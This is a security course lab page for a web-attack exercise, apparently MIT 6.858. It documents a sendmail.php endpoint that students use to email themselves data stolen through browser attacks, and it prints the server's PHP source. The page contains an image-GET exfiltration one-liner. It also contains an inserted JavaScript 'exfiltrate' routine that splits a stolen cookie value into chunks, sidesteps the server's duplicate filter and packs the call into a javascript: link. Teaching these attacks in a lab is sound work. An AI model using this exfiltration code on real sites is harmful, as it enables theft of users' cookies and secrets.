Lab 4 Email Script

You can use this server side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by our web server (css.csail.mit.edu). Another copy of the email always goes to 6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and you can receive credit for your work. (Don't worry about spamming our account while you test out your exploits; we will ignore mail to that address until we actually grade your submissions.)

(new Image()).src='http://css.csail.mit.edu/6.858/2017/labs/sendmail.php?' + 'to=your-mit-username@mit.edu' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored by the server, but it changes the URL on every request so the browser does not serve the image from its cache. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. Note also the limits enforced by the script (see its source below): the payload must be non-empty and at most 100 bytes after URL decoding, the address must end in @mit.edu, and an identical payload sent again within five seconds is rejected, so longer data has to be split into distinct chunks.
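The following is an added example and not code from the lab page: it builds the image-GET requests that sendmail.php will accept, using the limits visible in the script's source (payload at most 100 bytes after URL decoding, address ending in @mit.edu, identical payloads rejected for five seconds) and the cache-busting random argument recommended above. The address alice@mit.edu, the sample payload and the two-digit sequence tag are this example's own choices, not part of the lab.

```javascript
// Added example, not code from the 6.858 lab page. Builds the GET requests
// that sendmail.php (whose source is shown further down the page) accepts,
// splitting a long payload into tagged chunks that each fit the server's
// 100-byte limit and never collide with its duplicate-payload filter.
// The address and sample payload used below are constructed for this example.
const SENDMAIL_URL = 'http://css.csail.mit.edu/6.858/2017/labs/sendmail.php';
const MAX_PAYLOAD_BYTES = 100;   // server: strlen($payload) > 100 -> 413
const TAG_BYTES = 3;             // "NN:" sequence tag prepended to each chunk

// PHP's strlen() counts bytes, so measure UTF-8 length, not JS string length.
function utf8Length(s) {
  return new TextEncoder().encode(s).length;
}

// Split the payload into pieces that, once tagged, stay within the limit.
// for...of walks code points, so a multi-byte character is never cut in half.
function chunkPayload(payload, maxBytes = MAX_PAYLOAD_BYTES - TAG_BYTES) {
  const chunks = [];
  let current = '';
  for (const ch of payload) {
    if (current !== '' && utf8Length(current + ch) > maxBytes) {
      chunks.push(current);
      current = '';
    }
    current += ch;
  }
  if (current !== '') chunks.push(current);
  return chunks;
}

// Prepend a distinct "NN:" tag to every chunk so that (a) the recipient can
// reassemble them in order and (b) two chunks with identical content are not
// dropped by the server's apcu_add($payload, true, 5) duplicate filter.
function taggedChunks(payload) {
  const chunks = chunkPayload(payload);
  if (chunks.length > 100) {
    throw new RangeError('payload needs more than 100 chunks; widen the tag');
  }
  return chunks.map((chunk, i) => String(i).padStart(2, '0') + ':' + chunk);
}

// Mirror of the checks sendmail.php performs, so a doomed request is caught
// locally instead of silently producing a 4xx that an <img> never reports.
function serverWouldAccept(to, tagged) {
  return to.endsWith('@mit.edu')
    && tagged.length > 0
    && utf8Length(tagged) <= MAX_PAYLOAD_BYTES;
}

// One URL per chunk. encodeURIComponent takes care of newlines, '&', '=' and
// non-ASCII; the server URL-decodes before applying its strlen() check.
// `rand` is injectable so the output can be checked deterministically.
function buildRequestUrls(to, payload, rand = Math.random) {
  return taggedChunks(payload).map((tagged) => {
    if (!serverWouldAccept(to, tagged)) {
      throw new Error('sendmail.php would reject: ' + tagged);
    }
    return SENDMAIL_URL
      + '?to=' + encodeURIComponent(to)
      + '&payload=' + encodeURIComponent(tagged)
      + '&random=' + rand();   // cache-buster, as the page recommends
  });
}

// In a browser, fire each request exactly as the page's one-liner does.
// Returns the URLs so the caller can inspect them (and so this runs in Node).
function exfiltrate(to, payload, rand = Math.random) {
  const urls = buildRequestUrls(to, payload, rand);
  if (typeof Image !== 'undefined') {
    for (const url of urls) (new Image()).src = url;
  }
  return urls;
}

// Wrap a multi-line script in a javascript: link. Browsers percent-decode the
// body of a javascript: URL before running it, so newlines survive as %0A.
function toJavascriptHref(script) {
  return 'javascript:' + encodeURIComponent(script);
}

// Constructed sample: a stolen value longer than one request can carry.
const sampleUrls = exfiltrate('alice@mit.edu', 'cookie=' + 'x'.repeat(150));
```

In a page you control, `exfiltrate(to, stolenValue)` sends the chunks immediately; `toJavascriptHref(...)` turns a multi-line version of the same call into something that can sit in an href. The local `serverWouldAccept` check matters because an `<img>` load gives the attacker no feedback when the server answers 400, 413 or 429.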

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 5, you'll probably want to use the JavaScript image technique shown above.)


To: [____________] (@mit.edu e-mail address)

Payload: [____________] (the information you stole)

[Send Email]

Source code

In case you are curious, here is the source code of this page.


<?php
do {
    if (!array_key_exists("to", $_REQUEST)) {
        break;
    }

    $to = filter_var($_REQUEST['to'], FILTER_SANITIZE_EMAIL);
    if ($to === false) {
        header("HTTP/1.0 400 Bad Request");
        echo "Invalid e-mail address given in to field";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 100) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 100 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    if (substr(strrchr($to, "@"), 1) !== "mit.edu") {
        header("HTTP/1.0 403 Forbidden");
        echo "Please use an @mit.edu e-mail address.";
        return;
    }

    $grading = stristr($_SERVER['HTTP_USER_AGENT'], "Lab Grader");

    $logload = str_replace(array("\n", "\r"), '\n', $payload);
    $logged = true;
    if ($grading) {
        $logged = $logged && openlog("6858.sendmail.grader", 0, LOG_MAIL);
        $logged = $logged && syslog(LOG_NOTICE, "$to $logload");
    } else {
        $logged = $logged && openlog("6858.sendmail.students", 0, LOG_MAIL);
        $logged = $logged && syslog(LOG_INFO, "$to $logload");
    }
    $logged = $logged && closelog();
    if (!$logged) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to log mail request; not sending";
        return;
    }

    if ($grading) {
        header("HTTP/1.0 202 Accepted");
        echo "Payload logged";
        return;
    }

    $from = $to;
    $subject = "Message from $from";
    $message = "Payload:\n\n$payload";
    if (!mail($to, $subject, $message)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to relay e-mail to e-mail server";
        return;
    }

    echo "Sent!";
    return;
} while (0);

$link = "(new Image()).src="
      . "'http://css.csail.mit.edu/6.858/2017/labs/sendmail.php?'"
      . " + 'to=your-mit-username@mit.edu'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Email Script</title>
    </head>
    <body>
        <h1>Lab 4 Email Script</h1>
        <p>
            You can use this server side script to send automated emails from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause an email to be sent by our web server
            (css.csail.mit.edu). Another copy of the email always goes to
            6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and
            you can receive credit for your work.  (Don't worry about spamming
            our account while you test out your exploits; we will ignore mail
            to that address until we actually grade your submissions.)
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well. Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="http://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 5, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="to">To:</label><br />
            <input name="to" placeholder="your-mit-username@mit.edu" size="40" />
            <i>(@mit.edu e-mail address)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Send Email" name="send_submit" />
        </form>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>